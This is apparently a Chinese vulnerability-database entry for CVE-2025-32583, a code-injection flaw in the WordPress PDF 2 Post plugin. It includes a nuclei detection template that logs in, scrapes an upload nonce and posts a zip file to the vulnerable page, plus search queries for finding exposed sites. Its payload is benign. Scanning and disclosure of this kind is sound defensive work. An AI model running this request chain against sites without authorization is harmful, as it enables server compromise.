WordPress PDF 2 Post Authenticated Remote Code Execution

漏洞信息

漏洞名称： WordPress PDF 2 Post Authenticated Remote Code Execution

漏洞编号：

• CVE： CVE-2025-32583

漏洞类型： 代码注入

漏洞等级： 严重

漏洞描述： WordPress PDF 2 Post插件是一个允许用户将PDF文件转换为WordPress文章的工具，广泛应用于需要将PDF内容快速发布到网站的场景。该插件在2.4.0及之前版本中存在一个严重的代码注入漏洞，允许认证攻击者在服务器上执行任意代码。漏洞的根源在于插件对用户提供的数据处理不当，未能正确验证和过滤输入，导致攻击者可以通过构造恶意请求注入并执行任意代码。由于攻击者需要认证才能利用此漏洞，因此风险相对降低，但一旦攻击者获得认证权限，便能够完全控制受影响的服务器，导致数据泄露、服务中断等严重后果。建议用户立即更新至2.4.1或更高版本以修复此漏洞。

产品厂商： termel

产品名称： PDF 2 Post

影响版本： <= 2.4.0

搜索语法： body=”wp-content” && body=”pdf2post”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/a38eacc96d64321226c24dbe91b8f3e22f4659ff/http%2Fcves%2F2025%2FCVE-2025-32583.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-32583

info:
  name: WordPress PDF 2 Post <= 2.4.0 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in termel PDF 2 Post allows Remote Code Inclusion. This issue affects PDF 2 Post: from n/a through 2.4.0.
  impact: |
    An authenticated attacker can exploit this vulnerability to execute arbitrary code on the server.
  remediation: |
    Update WordPress PDF 2 Post plugin to version 2.4.1 or later.
  reference:
    - https://github.com/Nxploited/CVE-2025-32583
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32583
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-32583
    cwe-id: CWE-94
    cpe: cpe:2.3:a:termel:pdf_2_post:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: termel
    product: pdf_2_post
    verified: false
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content" && body="pdf2post"
  tags: cve,cve2025,wordpress,wp-plugin,rce,auth,intrusive

variables:
  filename: {{base64(gzip("Hello"))}}

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Type: multipart/form-data; boundary=57fbacb93533400815c1e2ec994fe293

        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="pdf2post_upload_nonce"

        {{pdf2post_upload_nonce}}
        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp-admin/edit.php?page=new-post-from-pdf
        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="pdf_file_to_upload"; filename="{{randstr}}.zip"
        Content-Type: application/zip

        {{filename}}
        --57fbacb93533400815c1e2ec994fe293--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "success"
          - "uploaded"
          - "processed"
        condition: or

    extractors:
      - type: regex
        internal: true
        group: 1
        name: pdf2post_upload_nonce
        part: body_2
        regex:
          - 'name="pdf2post_upload_nonce" value="([a-f0-9]+)"'